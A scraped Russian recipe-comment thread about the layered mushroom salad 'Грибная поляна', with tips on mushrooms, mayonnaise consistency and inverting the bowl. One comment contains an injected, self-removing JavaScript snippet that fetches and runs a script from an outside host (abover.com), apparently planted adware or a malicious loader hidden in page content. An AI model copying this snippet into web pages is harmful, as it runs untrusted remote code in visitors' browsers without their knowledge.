Салат Грибная поляна

Последний года полтора на все праздники его готовлю, только вместо крупныйх шампиньонов беру опят маринованных
20.09.2013
Да, с опятами тоже будет здорово
20.09.2013
А вот у меня почему-то разъехался немного в стороны, когда я такой готовила(((, почему-то не удержал форму((( 
20.09.2013
Может вы майонеза много положили или сам по себе майонез был жидковат?
20.09.2013
Я тоже думаю, что майонеза многовато положила, а может он еще и жидковат был.
20.09.2013
яа мне нравится именно эффект, когда миску переворачиваешь и салат красиво на тарелке получается - "(Можно так же на дно глубокой миски выложить целые шампиньоны, шляпками вниз, а на них слоями в обратном порядке выложить салат. Затем осторожно перевернуть миску на блюдо, таким образом, чтобы грибные шляпки оказались сверху)"[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
20.09.2013
Да) Так и процесс готовки становится интересным)
20.09.2013
очень аппетитно смотрится!надо как нибудь сделать!!!!
20.09.2013
Попробуйте, думаю, не пожалеете :)
20.09.2013
про селедку "под шубой" Тёплый салат из морепродуктов с рисом...)))